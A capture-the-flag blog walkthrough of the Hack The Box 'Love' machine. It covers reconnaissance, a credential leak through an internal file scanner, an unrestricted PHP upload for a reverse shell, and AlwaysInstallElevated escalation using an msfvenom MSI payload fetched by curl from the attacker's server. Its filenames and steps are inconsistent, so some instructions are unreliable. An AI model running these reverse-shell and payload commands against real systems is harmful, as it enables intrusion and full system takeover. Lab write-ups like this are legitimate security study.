Love hack the box walkthrough

LOVE WALKTHROUGH



WELCOME TO TAMILCODE 

  HERE IS TRICKS AND TECHNOLOGY 


HACK THE BOX | LOVE | WRITEUP



ON THIS WEBSITE WE ARE GOING TO SEE THE WALKTHROUGH FOR THE LOVE MACHINE, SO LET'S GET STARTED...




First, connect to the VPN provided by Hack The Box using the OpenVPN tool, which should already be installed in your Linux distribution.


STEP 1: openvpn filename.ovpn


Now the VPN has been started...




So now run the Nmap scan:


STEP 2: nmap -sC -sV 10.10.10.239


Below you can see the Nmap report.














Next, open another terminal and run the gobuster tool.

The command is below:

STEP 3: gobuster dir -u http://10.10.10.239/ -w /usr/share/wordlists/dirb/common.txt


The picture and report are shown below (gobuster report).

In the Nmap report you can see that port 80 has two websites: one is Apache and the other is the secure file scanner.


FOR UNDERSTANDING PURPOSES:

Here the Apache site is the voting system: www.love.htb

and the secure file scanner is: staging.love.htb

as shown in the picture below.



Let's change the hosts file on the Linux system, located at /etc/hosts (picture is below).


Enter the statement below (copy and paste):

10.10.10.239  staging.love.htb 


Now open the browser and load staging.love.htb.


You will be able to access the secure file scanner website.

Click the demo tab shown in the picture below.

Now you see the file scan search bar. I used all ports in the file scanning. At last I was able to see the one usual port, which is 5000, so enter the below command...


STEP 4: http://127.0.0.1:5000   




boommmm!!!! hurrah !!!!! yessss !!


You get the username and password, which are shown below.

So next we are going to access the admin page, which was found using the gobuster tool.


Open the admin page and enter the username and password.


Hurrah!! Now you are logged in to the website.


Now click the profile in the right corner (shown in the picture below). Click the update button; there you are able to see the photo uploading section. (NOTE THE VULNERABILITY: this section has no restriction to extensions like jpeg, png, etc.)


So, in this case, we upload the shell because it is a file inclusion vulnerability. The shell is below; copy and paste it into your notepad, and give it the PHP extension because it is a PHP shell.

e.g. love.php as the shell name
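
The check that this photo upload section is missing, written out as a server-side validator. This is an added example in Python, not code from the original post or from the voting system itself; the function name, size limit and sample bytes are assumptions.

```python
import os
import secrets

# Allowed photo types and the magic bytes each file must start with.
ALLOWED_TYPES = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
}
MAX_BYTES = 2 * 1024 * 1024  # assumed size limit for a profile photo


def check_photo_upload(filename, data):
    """Return (stored_name, reason); stored_name is None when rejected."""
    # Drop any client-supplied path, then look only at the final extension.
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_TYPES:
        return None, "extension %r is not an allowed image type" % ext
    if len(data) > MAX_BYTES:
        return None, "file too large"
    if not data.startswith(ALLOWED_TYPES[ext]):
        return None, "content is not a %s image" % ext
    # Never reuse the client's name: the server picks a random name and keeps
    # only the allow-listed extension, so a name like love.php is never stored.
    return secrets.token_hex(16) + ext, "accepted"


# Constructed sample uploads (not real files from the machine).
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
PHP_BYTES = b"<?php /* script body */ ?>"

if __name__ == "__main__":
    samples = [("me.png", PNG_BYTES), ("love.php", PHP_BYTES),
               ("love.php.png", PHP_BYTES), ("..\\..\\me.PNG", PNG_BYTES)]
    for name, body in samples:
        print(name, "->", check_photo_upload(name, body))
```

Magic bytes alone can be prepended to a script, so the upload directory should also be configured so that the web server never executes files stored in it.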





NOTE:

AS SHOWN IN THE PICTURE BELOW, ENTER YOUR tun0 IP ADDRESS


Before that, start netcat:


STEP 5: nc -lvp 9000 


USE ONLY THE ABOVE PORT OTHERWISE, IT WILL NOT WORK


STEP 6: upload the shell and give the current password used for login

Now you will get the shell.

Next, enter whoami and you get love\phoebe, so in this case you are a normal user. You will be able to take the user flag, which is user.txt.


STEP 7: cd users 


STEP 8: cd Phoebe


STEP 9: dir 


STEP 10: cd Desktop

 

STEP 11: dir 


hurrah !!!


You will see the user flag, which is user.txt.


So type the command below:


STEP 12: type user.txt

Now you have the user flag, so next we are going to get the root flag, which is root.txt.


So after a long time, I found that the machine allows MSI files through the AlwaysInstallElevated policy.


It would allow local privilege escalation, which was found using a Google search.


What is the AlwaysInstallElevated policy?


Windows comes with the Windows Installer engine, which MSI packages use to install applications. The AlwaysInstallElevated policy lets non-admin users install an MSI package file with elevated (system) privileges. When this policy is enabled in the Local Group Policy editor, it directs the Windows Installer engine to use elevated permissions when it installs any program on the system. This makes a machine vulnerable and poses a high security risk, because a non-administrator user can run installations with elevated privileges and access many secure locations on the computer.

Caution Note: 

This option is equivalent to granting full administrative rights, which can pose a massive security risk. Microsoft strongly discourages the use of this setting. Hence this should be used for lab purposes only (and not in a Production environment) (source)
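
A defender-side audit for this policy, as an added example in Python that is not part of the original write-up. Windows Installer honours the policy only when the AlwaysInstallElevated value is 1 under both the machine (HKLM) and user (HKCU) policy keys; the function names and the remediation strings are assumptions of this example.

```python
KEY_PATH = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_NAME = "AlwaysInstallElevated"
HIVES = ("HKLM", "HKCU")  # HKCU covers only the user running the audit


def read_policy(hive):
    """Read the DWORD from the live registry; None if key or value is absent."""
    import winreg  # Windows-only module, imported here so the rest runs anywhere
    roots = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    try:
        with winreg.OpenKey(roots[hive], KEY_PATH) as key:
            return winreg.QueryValueEx(key, VALUE_NAME)[0]
    except FileNotFoundError:
        return None


def audit_always_install_elevated(reader=read_policy):
    """Classify the host from the two policy values."""
    values = {hive: reader(hive) for hive in HIVES}
    enabled = [hive for hive in HIVES if values[hive] == 1]
    if len(enabled) == len(HIVES):
        status = "EXPOSED"   # any user can install an MSI as SYSTEM
    elif enabled:
        status = "PARTIAL"   # not effective yet, but one registry write away
    else:
        status = "OK"
    # Suggested clean-up; if a GPO sets the value, fix the GPO or it returns.
    fix = [r"reg delete %s\%s /v %s /f" % (h, KEY_PATH, VALUE_NAME) for h in enabled]
    return {"status": status, "values": values, "remediation": fix}


if __name__ == "__main__":
    try:
        print(audit_always_install_elevated())
    except ImportError:  # not on Windows: show the result for constructed values
        print(audit_always_install_elevated({"HKLM": 1, "HKCU": 1}.get))
```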


So now we are going to create the MSI file using Metasploit.


STEP 13: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.60 LPORT=9090 -f msi -o love.msi


Give your own IP address, otherwise it will not work.



Before that, start the reverse shell listener using netcat:


STEP 14: rlwrap nc -lvp 9090




If rlwrap does not work, install the tool with this command:

 sudo apt-get install rlwrap

Next, start the Python server in the folder where the payload is saved.


STEP 15: sudo python3 -m http.server 80


You should start it only on port 80, and use sudo for root permission.

NEXT, GO TO THE HTB MACHINE, WHICH IS THE LOVE MACHINE


USE THE TOOL WHICH IS CURL 


STEP 16: curl http://10.10.10.60/love.msi -o love.msi 


Instead of my IP, give your tun0 IP and the file (love.msi).



NEXT, WE ARE GOING TO SET UP THE FILE


STEP 17: msiexec /quiet /qn /i setup.msi

STEP 18: msiexec /quiet /qn /i reverse.msi



Use the above two steps: step 17 is used to set up the MSI file and step 18 to connect the MSI file to netcat.


After executing step 18, look at the netcat listener which I set up in step 14.


boommmm!!


Now you will get the shell in netcat, as shown in the above picture.

Now run the whoami command; it will show nt authority\system, which is the maximum privilege on the system. You are now administrator and will be able to access the root flag. Now go back using cd.










STEP 19: cd administrator


STEP 20: cd Desktop 


STEP 21: dir   


boommmm !!!! haaaa !!


You will be able to see the root flag, which is root.txt.


STEP 22: type root.txt 

So now you have the user flag and root flag for the machine. Thank you for reading the article; please share it, and if you have any doubts, please leave us a comment. If you want to download the article, click below to buy me a coffee, and please support us.





2 Comments

  1. msfvenom -p windows/x64/reverse_tcp_shell LHOST=10.10.10.60 LPORT=9090 -f msi -o love.msi

    Issue bro
    shell_reverse_tcp

  2. Next issue

    C:\Users\Phoebe>curl
    'curl' is not recognized as an internal or external command,
    operable program or batch file.
